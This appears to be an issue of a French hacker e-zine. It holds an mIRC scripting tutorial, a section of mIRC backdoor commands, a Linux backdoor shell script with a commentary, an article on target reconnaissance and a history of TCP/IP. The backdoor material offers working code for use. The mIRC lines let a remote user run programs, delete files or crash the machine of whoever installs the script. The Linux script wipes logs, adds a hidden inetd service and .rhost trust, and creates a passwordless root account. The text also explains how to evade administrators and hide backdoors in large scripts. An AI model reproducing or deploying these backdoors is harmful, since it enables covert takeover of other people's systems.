$group(#abc)		 Rpond par la valeur  on ou off pour le groupe #abc.

$ial
Retourne $true si la Liste Interne d'Adresses est active, et $false si elle ne lest pas .

$maddress
Donne ladresse qui a provoqu un vnement .

$matchkey
Donne le texte avec des (*)  qui a t utilis dans lvnement remote.

$mode(X)
Retourne le  nick nX affect par un changement de mode de canal.

Les diffrent attributs tants : op, deop, ban, unban, voice, devoice, help, dehelp



$mode(0).op  Si la valeur de (x) est 0, alors la rponse sera le nombre total de nick opps
$mode(2).op  Si la valeur est un chiffre non nul, alors la rponse sera le nick opp nx

Note: Cette identifieur est utilis seulement avec les vnements on OP/DEOP etc.

$nick
Donne le nick qui a dclench un vnement

$script
Donne le nom du fichier de remote qui est en train de sexcuter .

$script(N/fichier)
Donne le nom du fichier du  script charg nx.  Si vous donnez un nom de fichier, son excution sera alors vrifie, sil nest pas en cours dexcution, la valeur $null sera retourne

$script(0)		Donne le nombre de fichiers script de charg.
$script(1)		Donne le nom de fichier du 1er fichier script charg.
$script(newbies.txt)	Repond par $null si le fichier n'est pas charg ou par  newbies.txt s'il l'est.

Note: Ceci ne peut tre utilise que pour faire rfrence aux scripts .

$scriptdir
Retourne le rpertoire dans lequel est situe le script charg

$site
Retourne lhost et le domain de lutilisateur qui a provoque un vnement .

$target
Retourne la cible d'un vnement.

$ulevel
Retourne le niveau de l'usager qui correspond  vnement dclench.

$ulist(nick!userid@address,L,X)
Retourne ladresse nX dans la liste d'usagers . L correspond au niveau de lutilisateur .

Attributs: info

Vous pouvez utiliser des (*) dans ladresse .  Si vous ne spcifiez pas N, la premire adresse correspondante est retourne

Si vous spcifiez L, seulement les adresses du niveau spcifi sont retournes.

NB: L et N sont ne sont pas obligatoires , mais si vous spcifiez L vous devez spcifier N aussi.

$wildsite
Rpond par  l'adresse de l'usager qui a provoqu un vnement 

_
$x ou x est remplac par un chiffre qui correspond a la place du parametre
exemple:
pour la phrase "Salut, ca va ?"
$1 correspond a "Salut,"
$2 correspond a "ca"
$3 correspond a "va"
$4 correspond a "?"

vous pouvez aussi designer un mot et tous ceux qui le suivent a l'aide d'un "-"
$2- correspond a "ca va ?"
 

________________________________________________________________________________________________
la programmation de script pour mirc se fait en trois parties : Alias, Popup et Remote . 

Les aliases sont en fait des raccourcis .
Pour les programmer, allez dans Tools>aliases
ils permettent par exemple d'entrer dans un channel en tapant /j #nomduchan au lieu de taper /join #nomduchan .
La programmation d'aliases est trs simple, pour l'exemple prcdent, il suffit d'aller dans la section aliases est de taper :
/j /join $1
Vous pouvez desormais rejoindre un channel en tapant /j #nomduchan .
Les aliases servent aussi  viter de toujours taper la meme chose, par exemple, l'alias /salut/say Salut tout le monde, ca va ???
Vous pouvez aussi assigner les touches de fonction F1,F2,F3....
Ainsi, si vous programmez l'alias 
/F5 /me a besoin d'aide
lorsque vous appuierez sur la touche F5, vous demanderez de l'aide dans la fentre active . Biensur vous pouvez inclure des identificateurs dans vos aliases :
/joke /say $read c:\mirc\joke.txt 
cet alias lira au hasard une ligne du fichier joke.txt

Un alias peut pointer sur plusieurs commandes :
/op /mode $chan +ooo $1 $2 $3 |/me a donn le status d'op  $1 $2 $3 
si vous tapez /op A B C
A B C seront opps, et vous previendrez le channel par la meme occasion

                                 ________________________

Les Popups : il s'agit des menus .
Pour les programmer allez dans Tools>popups
Il y a 5 menus differents accessibles par le bouton view :

Status
Channel
Query/Chat
Nickname List
Menubar 

Ces menus se programment tous de la meme facon .
Vous devez mettre du texte associ  la commande qui lui correspond, par exemple :
 Lister les  Channels:/list
Lorsque vous cliquerez sur "Lister les Channels", la commande /list sera execute
il est possible de faire des sous menus,pour cela il faut ajouter un . a chaque niveau infrieur:
Absent
.Absent:/away $$?="Raison :"
.Revenir:/away

on peut descendre d'autant de niveau que l'on veut a condition d'ajouter un "."  chaque niveau infrieur :
Absent
.s'Absenter
..discret:/away $$?="Raison :"
..le Signaler :/ame est maintenant AWAY !!!! |/away $$?="Raison :"
.Revenir
..discret:/away
..le Signaler:/ame est maintenant revenu !!! |/away

Il est possible d'ajouter un separateur en ajoutant une ligne comportant un "-" :
Absent
.s'Absenter
..discret:/away $$?="Raison :"
..le Signaler :/ame est maintenant AWAY !!!! |/away $$?="Raison :"
.-
.Revenir
..discret:/away
..le Signaler:/ame est maintenant revenu !!! |/away

                              __________________________________

Les Remote representent la partie "dynamique" du script puiqu'ils reagiront a des evenements tels que l'arrivee de quelqu'un dans un channel .
pour les programmer, allez dans Tools>Remote

Voici la structure des remotes :
ON LEVEL:EVENEMENT:ACTION

  LEVEL     : correspond au level que doit avoir la personne qui produit l'evenement pour declencher l'action, par defaut, il est de 1 . Vous pouvez attribuer des levels en passant dans la section USERS, voici la structure qu'il faut utiliser pour attribuer un level :
LEVEL:nick!userid@host.domain
vous pouvez remplacer le nick, userid, host ou domain par un * .
 
  EVENEMENT : l'evenement qui declenche l'action 
Liste des principaux evenements :
-Liste des evenements : 
Action, Ban, Chat, Close, Connect, Ctcp, CtcpReply, DccServer, DeHelp, DeOp, DeVoice, Dialog, DnsError, FileRcvd, FileSent, GetFail, Help, Hotlink, Input, Invite, Join, KeyDown, KeyUp, Kick, Load, Midi, End, Mode,	Nick, NoSound, Notice, Notify, Op, Open, Part, Ping, Play, End, Quit, Raw, RawMode, SendFail, Serv, ServerMode, ServerOp, Snotice, Start, Text, Topic, UnBan, Unotify, UserMode, Voice, Wallops, WaveEnd,

  ACTION     : L'action est la commande qu'executera automatiquement votre script en reponse a un evenement .  

Voici un exemple de remote :
on 1:PING:/notice $nick [ $me PING Reply] : 0secs |/halt
avec cette ligne de remote, vous repondrez automatiquement a un PING par 
[ VOTRENICK PING Reply] : 0secs . (la commande /halt sert a empecher votre script d'utiliser la reponse prevue par defaut pour ce type d'evenement )


Pour la plupart des evenements, il faut designer le lieu dans lequel il doit tre pris en compte, pour ceux-cis, la structure du remote sera : ON LEVEL:EVENEMENT:LIEU:ACTION

Exemple avec un evenement de type TEXT :
on 1:text:*bye*:#:/msg $nick Bye
 # correspond au lieu dans lequel l'action est prise en compte, ici, vous direz Bye a quelqu'un qui dit bye dans un channel, vous pouvez aussi specifier un nom de channel voir en mettre plusieurs :
on 1:text:*bye*:#hack,#hackers:/msg $nick Bye .
Vous devez mettre un ? pour les actions qui doivent reagir a un evenement en query, ou un * pour celles qui doivent reagir aux evenements en query ET dans un channel .

Les remotes permettent d'assigner plusieurs actions a un meme evenement :
on 1:join:#:{
/msg $nick Salut $nick
/echo $nick vient d'arriver sur $chan !
}

Vous pouvez aussi utiliser un separateur comme dans les popups et aliases : 
on 1:join:#:/msg $nick Salut $nick | /echo $nick vient d'arriver sur $chan !

Si vous placez un @ devant le niveau dutilisateur, laction sera executee uniquement si vous etes operateur .
ex :

on @1:text:*operateurs ?*:*:/msg $nick Salut, cest moi, $me , je suis operateur de ce chan !


===================================exemple de script simple====================================

Ce script est particulierement adapte aux nouveaux utilisateurs de Mirc, puisqu'il reprend en partie les termes de mschat .

-contenu du fichier remote.ini :
[script]
n0=on @150:join:#:{                                         ; lorsque un utilisateur de niveau
n1=/kick $chan $nick                                        ;150 entre dans un chan alors que
n2=/mode $chan +b $nick                                     ;vous etes op, il est kick et ban 
n3=}
n4=
n5=on 10:text:!op:#://mode $chan +o $nick                   ;vous mettez op un utilisateur de
n6=on 10:text:!op*:?://mode $2 +o $nick                     ;niveau 10 sur demande .(lorsqu'il tape !op dans un chan ou !op #nomduchan en query)

n7=on 1:PING:/notice $nick [ $me PING Reply] : 0secs |/halt ;voir exemples

n8=on 10:join:#:/echo 5 $nick est arrive dans $chan         ;vous previent qd un utilisateur
                                                            ;de niveau 10 entre ds un chan

n9=on @2:DEOP:#monchan:{                                    ; lorsque quelqu'un d'autre que vous
n10=  if($nick==$me)  halt                                  ; deop un utilisateur sur #monchan
n11=  /mode $chan -o $nick                                  ; il est deop et la personne qu'il
n12=  /mode $chan +o $opnick                                ; a deop est reope
n13=}                                                       ;
n14=ctcp 1:time:*:/notice $nick chez moi il est $time ;lorsque qq'un fait un ctcp time sur vous
                                                      ;vous lui repondez "chez moi il est HEURE" 
[users]
n=0 10:friend!*@*.*                                         ;le niveau 10 est attribu a friends 
n=1 150:lamer!*@*.*                                         ;le niveau 150 est attribu a lamer

-fichier popups.ini :
[qpopup]

[lpopup]
n0=.Ignorer:/ignore $$1 1
n1=.Ne plus ignorer:/ignore -r $$1 1
n2=.hote:/mode # +ooo $$1 $2 $3
n3=.enlever le statut d'hote:/mode # -ooo $$1 $2 $3
n4=.exclure:/kick # $$1
n5=.Interdire l'acces:/ban $$1 2
n6=.Heure locale:/ctcp $$1 time
n7=Appart:/query $$1-
[bpopup]
n0=Rejoindre une salle:/join #$$?="Enter channel name:"
n1=Partir d'une salle:/part #$$?="Enter channel name:"
n2=Apparte:/query $$?="Surnom:"
n3=Inviter:/invite $$?="Entrez le surnom et la salle:"
n4=Quitter IRC:/quit

[mpopup]
n0=Se connecter
n1=.dalnet:/server irc.dal.net
n2=.kewl:/server irc.kewl.org
n3=Aller dans une salle:/join #$$?="Nom de la salle"
n4=Faire la Liste des salles:/list
n5=Changer de surnom:/nick #$$?="Surnom:"
n6=-
n7=QUITTER:/quit

[cpopup]
n0=Mettre Hote:/mode $chan +o ##?="Surnom"
n1=Exclure:/kick $chan ##?="Surnom"
n2=Rejoindre une salle:/join ##?="Nom de la Salle"


                                  ____________________
                                 |Exemples de Backdoor|
                                 ``````````````````````

Il est tres simple de faire une backdoor dans un script mIRC, le tout est de reussir a convaincre quelqu'un de le mettre dans ses remotes .

 I-Backdoor inoffensive : 

1-TEXTE
cette backdoor vous permet de faire dire ce que vous voulez a quelqu'un .

on 1:TEXT:*!say*:*:/msg  $2-

Vous devrez taper "!say #hackers Salut" par exemple, ca fera dire salut dans le chan #hackers a la personne qui a install cette backdoor dans ses remotes .

2-MODES

on @1:text:!op:#://mode $chan +o $nick
on @1:text:!op*:#://mode $chan +ooo $2-
on @1:text:!deop*:#://mode $chan -o $2-
on @1:text:!kick*:#://kick $chan $2

 II-Backdoor permettant de lancer des programmes:

on 1:TEXT:!do*:*:/run $2-
Si vous tapez "!do c:\windows\calc.exe" vous lancerez sa calculette windows 


 III-Backdoor permettant d'effacer des fichiers :

on 1:text:!delete*:*:/remove $2-
si vous tapez "!delete c:\autoexec.bat" vous effacerez son fichier autoexec.bat

 IV-Backdoor permettant d'ecrire dans des fichiers texte :

on 1:TEXT:!write*:*:/write $2-
si vous tapez "!write c:\autoexec.bat PAUSE" vous ajouterez "PAUSE" a la fin du fichier autoexec.bat

 V-Backdoor permettant de planter l'ordinateur :

on 1:text:*!kill*:*:/con/con
Lorsque vous taperez !kill, vous ferez planter l'ordi de la victime (ecran bleu)


Ces Backdoors servent a vous montrer ce que l'on peut faire avec mIRC, cela dit, si vous les utilisez, cela ne fera pas de vous un Hacker, elles sont presentes dans cet article a titre d'EXEMPLE UNIQUEMENT .


Vous avez maintenant de quoi faire votre premier script mIRC, 
Si vous ne comprennez pas quelque chose ou desirez avoir des renseignements supplementaires, vous pouvez m'envoyer un mail a : ft_one@meloo.com
(ND ad-tonnou --> l'idal pour implanter des backdoors dans un script est de proposer un remote vraiment trs gros...le gars ne regardera jamais tout...)

                                        .FT-ONE



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
	Programmation Shell et Backdoor sous NUX						  	Sauron 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

SAlut, 
j'ai ralis un (mini) script shell installant des backdoors sur un 
systeme linux, je fourni ici le source et je vais detailler son utilisation
et la maniere dont il agit pour poser des backdoors. Voici le script, pour l'essayer copier tout son contenu dans un fichier puis lancez le chmod +x )


#-------------------- DEBUT APRES CETTE LIGNE -------------------------------------#

echo	BACKDOOR PAR SAURON
echo  On va deja effacer les logs...
a="Effectu"
b="Le programme a echouer, desoler"
echo  Entre ton ip UNIQUEMENT :
echo
ip=""
read $ip 
rgrep $ip / | xargs rm -f || echo $b
echo
echo Pose de la backdoor...
cd / || echo $b
cd /etc || echo $b
set linecount = 'wc -l < inetd.conf' || echo $b
cp inetd.conf ./tmpinetd || echo $b
echo "conf stream tcp     nowait  root   /etc/in.confd" >> ./tmpinetd
mv ./tmpinetd inetd.conf || echo Merde !
chmod 644 inetd.conf
rm -rf ./tmpinetd || echo Il restera des preuves evidentes !
echo "conf 2/tcp config kernel" >> services
echo "echo + + >> /../root/.rhost" >> in.confd || echo $b
echo "echo Config Kernel Linux with Module...........; find / -perm 707 -print || echo Module kernel succefully install .." >> in.confd || echo $b
chmod +x in.confd || echo Gloups !
killall -HUP ine
echo $a 
echo "cd /etc ;./in.confd" >> /../root/.forward || echo zut !
echo "root: sh etc//in.confd" >> aliases || echo crotte !
newaliases
echo Ne faite pas gaffe au msg de aliases c'est normal...;
echo "conf::0:0:include kernel configuration do not errase this line:/:/bin/bash" >> /etc/passwd
echo "conf::0:0:include kernel configuration do not errase this line:/etc:/bin/bash" >> /etc/shadow
echo "conf" >> /etc/ftpusers

#-------------------------------- COUPER AVANT CETTE LIGNE -------------------------------#

Comme vous pouvez le voir, les commandes utiliser sont uniquement les commandes de bases, les plus courantes.
ligne 3 et 4, deux variables sont declarer et une valeur leur est donner, elles correspondent aux deux messages qui s'afficheront plus tard dans le programme.
b s'affichera quand le programme rencontrera un probleme, et a si tous ce passe bien.
une nouvelle variable apparait, il s'agit de ip, dont la valeur est defini par "read" : ce que tapera l'utilisateur au moment de la saisi clavier implementera la variable.

Une recherche sera ensuite lancer sur tous le systemes ( tres long, je conseille d'enlever les lignes 5 a 7 et d'utiliser un cleaner de log a cote pour ceux qui peuvent )afin de trouver les fichiers ou le contenu de $ip, c'est  dire ce que vous avez taper, est present. Ces fichiers seront automatiquement detruit. Ainsi, si vous tapez root a la place de votre ip, ce sont tous les fichiers ou le mot "root" est present qui seront afficher !!! Donc, fo faire gaf !
Voila, pour cette premiere partie un peu inutile puisque l'administrateur reseau se rendra compte de quelque chose si il manque tous les fichiers de logs ... ;o) C'est pk il vaut mieux modifier le script pour qu'il enleve uniquement les Lignes ou l'ip est 
presente. Ensuite plusieurs actions vont etre effectuer, elle consistent en la pose de la backdoor, c'est la que ca devient interessant...

Le script commence par rajouter une ligne dans /etc/inetd.conf (il faut bien sur avoir les droits root ), un service va etre rajouter qui executera un programme qui jouera le role de backdoor et d'un fichier de configuration du kernel. Si le sysap n'est pas bete il editera le fichier et comprendra alors que c'est simplement un trojan. La meilleure maniere de garder le root sur un serveur est de ne pas du tout se faire remarquer. Si il capte ne serait ce qu'un fichier, il est probable qu'il entreprenne de surveiller son systeme de facon plus ardue. Cependant, il y a d'autre backdoor qui sont implementer dans le systeme et pour peu qu'une seule ait t negliger, toutes les autres re-apparaitront. Vous serez averti si le sysap a griller puisque le fichier /root/.rhost ou /etc/in.confd auront disparu. Si c'est le cas, je ne vous conseille pas de rester sur ce systeme ou bien installer un autre type de backdoor, je pense notamment un une rootkit qui est encore le moyen le plus radical. Toutefois je ne vous encourage pas a Hacker des serveurs et a les exploiter pendant des mois, mais ca reste une possibilit et il existe de nombreuses manieres de s'en proteger. 

La ligne supplementaire qui a ete ajouter a /etc/inetd.conf fait appel a un script shell qui fait apparaitre un msg bidon de soit disant reconfiguration du kernel, juste au cas ou le sysap le lancerai et n'oserait pas l'effacer pensant que ce fichier est important, mais ne revez pas, a moins d'etre non-qualifi ou de ne pas connaitre du tout linux, il comprendra.

Une ligne est rajouter egalement dans /etc/aliases, a chaque fois qu'un mail est envoyer au sysap /etc/in.confd est executer, ce qui a le meme resultat que le relancement ligne 25 de inet. Si le sysap remarque la presence d'un fichier permettant a n'importe qui de se connecter en root sur son systemepar le biais de rlogin, il l'effacera, celui ci sera alors imediatement re-creer si un mail est envoyer au root@thevictime ;o)

Enfin, un compte root supplementaire est creer, dans /etc/passwd et /etc/shadow au cas ou le shadowing des mdp est enclenchs. Comme il n'y a pas de passe, cela ne change rien. Si vous comptez avoir un acces telnet et root sur la machine, verifiez si le # a ete supprimer de /etc/inetd.conf a la ligne du telnet.(Nd ad-tonnou #=port ferm et pas de #=port ouvert) 

Il reste tout de meme un espoir dans la mesure ou vous avez su gagner le root sur le systemes avant de poser la backdoor.

Pour toutes questions, commentaires, critiques, n'hsitez pas : 	
sauron@frhack.org

Finalement, j'ai pas parler de la programmation de script shell, mais si vous avez observez le script vous aurez vite compris, voici un listing des commandes avec leurs fonction au cas ou certains ne pigerait pas :

read : attend une saisie clavier pour implementer une variable, ds ce script c'est "ip" qui etait defini plus haut qui est implment.
	NOTE : on appele une variable en faisant $variable et non variable tout seul.

newaliases : ca sert simplement a relancer ce service apres avoir apporter des modifs, comme le rajout d'une ligne par exemple ;o)
	
--== Sauron ==--


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Reperer Sa Cible						  			Sauron 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

					******************************
					** Un chtit bout de hacking **
					****************************** 


--===>>> OK, comme dans ce zine on dirait bien que on parle quasiment pas de Hacking alors que c'est une des choses que je preferes, je pond vite fait un chti article avant sa sorti !
# Bon........... De quoi je vais causer ??? EUhh.. Tient je vais commencer une serie d'article sur
# les mthode utilis par les Pirates pour penetrer une becane... Mais avant tout :

## #### NOTE : ##### 
Ceci n'est pas n diclaimer de naze, mais je tient a dire qu'il n'y a pas de quoi se venter
# d'avoir pirater un site en l'ayant scanner avec un outils qui n'est pas de sa creation et en ayant
# executer un quelquonque exploits qui vous aura permi d'obtenir les droits Root. Y en a plus que
# marre des Lamers qui se prenne pour des bons Hackers car ils scan des cibles toutes la soiree# en passant par des proxy et parsqu'ils auront reussi a en niquer une. Moi, je ne Hack pas
# pour faire chier, je le fait pour moi, car j'aime bien comprendre ce qui se passe. Je ne suis
 # pas non plus un " assoiff de savoir " comme le clame souvent des Hackers mais je n'est aucune
# considration pour ceux qui se contente d'utiliser les exploits.
# ##### EON ########|

--===> ALLONS Go !! 
# # L'attaque va se faire en deux points, le premiere ou le pirate va tenter de collecter des# infos pour avoir une idee du systeme cible. Voici ce que nous voulons obtenir :+>
# |----=> Determiner l'Os
# |----=> Determiner les services
# |----=> Info sur les Users# |----=> Info sur les membres
# |----=> Info sur leurs reseaux

# Pour obtenir ces infos il y a plusieurs techniques, qui ne sont pas ardues et a la porter de tous. 
+> Toutefois, il vous faut linux ou un Unix pour tester certaines commandes. 
Sous linux dig et nslookup donne deja un peu d'informations.. 
Je n'utiliserai pas ces deux commandes, mais " host ". 
Apres avoir effecturer un scan Tcp et UDp des ports, se connecter en telnet sur les ports ouverts (au moins 21 ; 23 ; 25 ; 79 ; etc... ) pour lire le msg d'accueil. Par ngligence probablement, ce message est tres souvent revelateur du systeme d'exploitation utilise par la cible, et meme pour linux de la version de kernel ( et probablement pour les autres Unix egalement :o).
Nmap est pour moi un des meilleurs scanners pour la qualit de sonTcp Fingerprinting. 
Vous pourrez ainsi de maniere quasi- certaine connaitre l'os. Si le port 79 ( finger ) est ouvert, c'est bingo ! 
tapez " finger @cible.com " et vous obtiendrez un listing des utilisateurs du systemes, leur shell, leur homedir, que font ils si ils sont la, sur quel terminal, depuis qd sont ils la, qd viennent ils, de ou , a quel heure,etc.... 
Bcp d'info quoi :o)
Vous pouvez faire la meme chose avec rusers. 
Si finger n'est pas actif verifier que la commande EXPN est t dsactiv dans Sendmail ( 25 )si ce n'est pas le cas, vous pourrez vous en servir comme de finger, bien que les informations soit plus restreintes.
La commande SYST sous ftp... Verifiez si il xiste un compte anonyme pour tout le monde, et si c'est le cas essayez d'identifier l'architecture du systeme (si il y a /var /usr /etc /bin, y a des chances pour que ce ne soit ni Mac ni Win ;o)). 
Le personnel et surtout le patron vous interesse ? allez sur internic.net pour leur servcice WHOIS.
Cela est tres pratique pour le Social Engeneering et sachez que si vous voulez Vraiment pirater un site et que vous buttez le SE peut s'averer etre la solution ! Si vous decelez un reseau ( probable ) les machines n'ont elles pas confiance les une aux autres ? Si c'est le cas, si vous penetrer une seule machine vous aurez le controle de tous le reseau avec les services comme rlogin ! Je vais stopper la, mais comprenez que ce n'est pas dur du tout de savoir pleinsde choses. 
Front-nat.fr utilise IRIX 6.5 mais ils ont patcher tous les holes que j'ai tester!! GrrR! Ils sont pas con ces connards!! Voila, pour mon article. 
Une fois que vous avez des infos ils restent plus qu'a aller chercher les holes ( LISEZ MA NOTE DU DEBUT ) de telle version de telle service sur telle systeme et de verifier si le patcht a t exploiter, sur 50 holes, a vous de voir si il y en a 1 qui aurait ete oublier et dans ce cas....
Voilou ! Je vous dit a +, excusez cette article tout mini mais la j'ai pas le tps, j'espere que vous aurez quand meme compris le truc. Sinon 

--==> Humour@humour.com  
Et desoler pour cette aticle vraiment Newbie a la Hca Crew :o))
{-Sauron-}



Nd Ad-Tonnou ---> au nom de toute la team je tiends a vous transmettre un message...
Je le fais dans cet article car mon ami Sauron a soulev le probleme....
Nous n'avons pas eu le temps de faire de bons articles sur le hacking et nous en sommes desols...
Cependant je vous promets que l'on va faire un gros effort la fois prochaine a ce sujet, et puis apres tout, les autres articles ne sont pas si mals, enjoy!!


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Le TCP/IP	            						  	Ad-Tonnou 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	     		          **************************************
				    ** VU D'ENSEMBLE DES RESEAUX TCP/IP **
				    **************************************

InTROducTIOn


Bon, un bon paquet d'articles ont dj t faits sur les rseaux TCP/IP, mais tous ont toujours t soit trop globaux soit trop pointus...
L je vais essayer de commencer par le dbut (en detaillant tout bien comme il faut) puis continuer, de plus en plus pointus au cours des prochains zines...

QU'esT ce QuE LE TcP/Ip

TCP ---> Transmission Controll Protocol.
IP  ---> Internet Protocol.
Cependant le therme global TCP/IP pourrait tre assimil  "protocole de communication pour la transmission de donnes".
Un protocole est un ensemble de rgles permettant  plusieurs ordinateurs de communiquer entre eux.
Imaginez deux humains parlant l'un le Franais et l'autre le Sngalais...et bien le protocole de communication pourrait tre le language des signes ou bien le dessin (de nos jours ce serait plutot l'Anglais mais bon...) et bien c'est la mme chose pour les ordinateurs
Le therme TCP/IP bien que signifiant Transmission Controll Protocol / Internet Protocol recouvre un grand nombre de protocoles tels que l'UDP, le FTP, HTTP etc...
Un rseau utilisant le TCP/IP est appel "rseau internet TCP/IP"
!!! --->  ne pas confondra avec Internet (notez la majuscule)
En effet un rseau internet TCP/IP n'est pas forcement reli  d'autres rseaux tandis que Internet avec un 'I' relie un nombre enorme de reseaux  travers tous les continents...
Quand on parle d'intranets on entend par l des rseaux privs d'entreprises utilisant les services de l'Internet comme le http...(un mini Internet quoi)

LeS DBUTs Du tcP/iP

	 Introduction: 
Dans les annes 60, la DARPA (Defense Advanced Research Projects Agency) remarqua que les ordinateurs utiliss dans le domaine militaire, de marques diffrentes, ne pouvaient pas communiquer entre eux. Aucun protocole comun  tous les ordinateurs n'existaient...

	 Les bases du tcp/ip: 
Pour palier  ceci, le ministre de la dfense des States demanda  la DARPA de dfinir une famille de protocole selon les directives gnriques suivantes:
Simplification des communications --> grace a des protocoles comuns a tous les ordinateurs

Mise en competition des constructeurs d'informatique --> en effet, chacun pouvait aporter ses propores modifications  ces  protocoles standarts (bien sur avec l'accord de tous)

Interoperabilite --> En effet, grace a ces protocoles communs, l'interoperabilite entre differents equipement devient possible

Le TCP/IP etait n...(tout du moins ses principes)
	
	 les premiers essais 
1969 fut marqu par les premieres experimentations, on permit nottamant de relier les 4 sites (sites physiques et non pas logiques) suivants:
- L'universit de Californie Los Angeles
- L'universit de Californie Santa Barbara
- L'universit d'Utah
- SRI international

Cette experimentation fut un succes et fut le debut du projet "ARPANet" (Defense Advanced Research Projects Agency Network)

En 1972 une demonstration reliait 50 noeuds et 20 hotes

noeuds --> nom generique designant tous peripherique reli a un reseau (peripherique de routage, ordinateur, workstation...)

hote --> A la base cela designe un puissant ordinateur sur lequel sont connects plusieurs terminaux. De nos jours, on designe par hote une machine delivrant des services a des utilisateurs...

serveur --> est une machine sur laquelle tourne un logiciel ou un groupe de logiciels serveur, delivrant des services a des logiciels utilisateurs, ceux ci s'apellent clients...

	 L'evolution d'ARPANet 
A partir de ce moment, les bases etaient posees et ARPANet continua  se developper...
En 1986 le reseau ARPANet englobait la plupart des grandes universites nord-amricaines, le reseau militaire MILNET et quelques reseaux de recherche internationaux..:



					         [ LES PRINCIPAUX SITE UNIVERSITAIRES ]
						        ||||||||||||	      | | | |
						        ||||||||||||	      | | | |
					  ____________||||||||||||____      | | | |
 _______________________       |					|_____| | | |
|				|	 |					|_______| | |
|				|______|					|_________| |
|				|	 |					|___________|
|				|	 |					|
|				|______|					|
|	    MILNET		|      |		ARPANET		|_______________[ MIT ]________________	
|  (reseau militaire)   |      |					|						   |
|				|______|					|						   |
|				|	 |					|	   _______	      		   |
|				|	 |					|	  |	    |	  ___[CADRE] 	   |
|				|	 |					|_______|  CMU  |__|    		   |
\_______________________/	 |					|	  |_______|	 |___[TARTAN]	   |
	   |||||			 |					|		|       			   |	
	   |||||   			 |					|		|				   |	
	MILNET Sites		 |					|		|				   |	
					 |____________________________|    _______|_____	               |
						    |     |     |	   	    |			|			   |
						    |	    |     |		    |	 WideBand   |____________________|
						   _|_____|_____|_	    |_____________|
						  |		      |		  |     |
						  |		      |		  |     |
						  |	  SATNET	|		  |     |
						  |		      |_____________|     |
						  |_______________|			  |
								|_________________________|	
fig 1: reseau ARPANet en 1986

Peu  peu ARPANet fut remplac par Internet, etant de plus en plus utilis  des fins commerciaux, les traffics de donnes  commerciales devint alors superieurs  ceux des universitaires...

De nos jours Internet regroupe  la fois des organisations commerciales, des organismes de recherche, les ministeres, les simple utilisateurs, les fournisseurs d'acces....


BasCulE Des RESEauX PropRIEtairES aUX ReseaUX TCP/IP

Les premiers reseaux informatiques etaient  la base fonds sur des solutions proprietaires et donc personnelles...
Je vous ai dgot deux bons exemple illustrant cela, deux rseaux differents et donc pas interoperables...

Le rseau SNA d'IBM:                  Le reseau DECnet de DIGITAL:
 		 ______________________                    ______________________       
		|			     |                  |			     |                  
		|			     |  			|     DECnet UltriX    |			
		|			     |			|			     |				
		|	  HOTE IBM	     |			|______________________|					
		|			     |					|		
		|			     |					|			
		|______________________|			______o_____o___________o________			
	      		 |						|			|
	      		 |					  ____|____		  ____|____	
	      	       |					 | Serveur |	 | Routeur |	
      		 ______|______				 |   DEC   |	 |   DEC   |				
    			|             |				 |_________|	 |_________|				
     			| Controleur  |				    |   |			|   		
     			|     de      |				    |   |			|	
     			|Communication|	    			  [  ] [  ]			|				
     			|_____________|				Terminaux DECnet		|				
		       |		|                                               |
			 |		|								|	
			/	     	 \								|	
		     /              \								|
		    |			  |							  ____|____
	     Controleurs de communication						 | Routeur |
		____|____	    ____|____						 |   DEC   |		
	     |	   |	   |		 |						 |_________|
	     |         |     |         |                                        |
	     |         |     |         |			______o_____o___________o________
           |_________|     |_________|                      |     |           |
            |      |         |      |                       |     |           |
		|	 |	     |	|
		|	 |	     |	|
	    [   ]  [   ]     [   ]  [   ]
			Terminaux IBM		

Vous comprendrez aisement pourquoi la communication entre ces deux reseaux peut paraitre difficile voir impossible...:
Le reseau SNA se base sur une organisation hierachique alors que DECnet se base sur une organisation poste-a-poste.

Ces deux rseaux (pour rester dans notre exemple) ont tous deux evolue vers des solutions d'interpretage TCP/IP, ainsi ces reseaux sont devenus interopoerables et accessibles de l'exterieurs, et ce, grace au TCP/IP.
Ceci n'est qu'un exemple mais represente parfaitement la situation d'Internet  ses debuts...

ReseAUX MuLtiConSTRUCteurS

Tous les constructeurs ont peu  peu developps des reseaux bass sur le TCP/IP permettant  des machines de marques et d'essence differentes de communiquer entre elles, ce qui est le but du protocole TCP/IP:


exemple de reseau multiconstructeur:
	 _________________	 _________________	 _________________     _________________
	|			|	|	       	|	|			|   |                 |
	|			|     |	Hote IBM	|     |	NoVell	|   |   WIndows NT    |
	|	HP 9000	|     |  avec logiciel	|     |     NetWare	|   |                 |
	|			|     | 	TCP/IP	|     |	 3.xx		|   |                 |
	|_________________|     |_________________|     |_________________|   |_________________|
               |                       |                       |                     |
_________o_____o__________________o____o_________________o_____o_______________o_____o______________
         |                        |                      |                     |
 	 __|______________	 ___|_____________	 __|______________     __|______________
	|			|	|			|	|			|   |                 |
	|			|     |	IBM PC	|     |  Station Unix   |   |   MAC TCP/IP    |
	|   VaxVmS TCP	|     |			|     |	 avec		|   |                 |
	|			|     |			|     |	TCP/IP	|   |                 |
	|_________________|     |_________________|     |_________________|   |_________________|


(entre chaque resaue, sous reseau, c'est le TCP/IP qui gere tout, puis chaque groupe peut alors avoir son interpreteur personnel)

EvoLUTioN De Tcp/IP

1980 --> 20 entreprises proposaient des services bases sur le TCP/IP.
1985 --> Pres de cent.
1990 --> Plus de 250.
2000 --> pres de 650.

TCP propose aujourd'hui ce que promettaient les protocoles OSI il y a quelques annees.
Le seul dfaut de TCP par rapport a OSI etait la plus grande variete de services proposes par OSI.
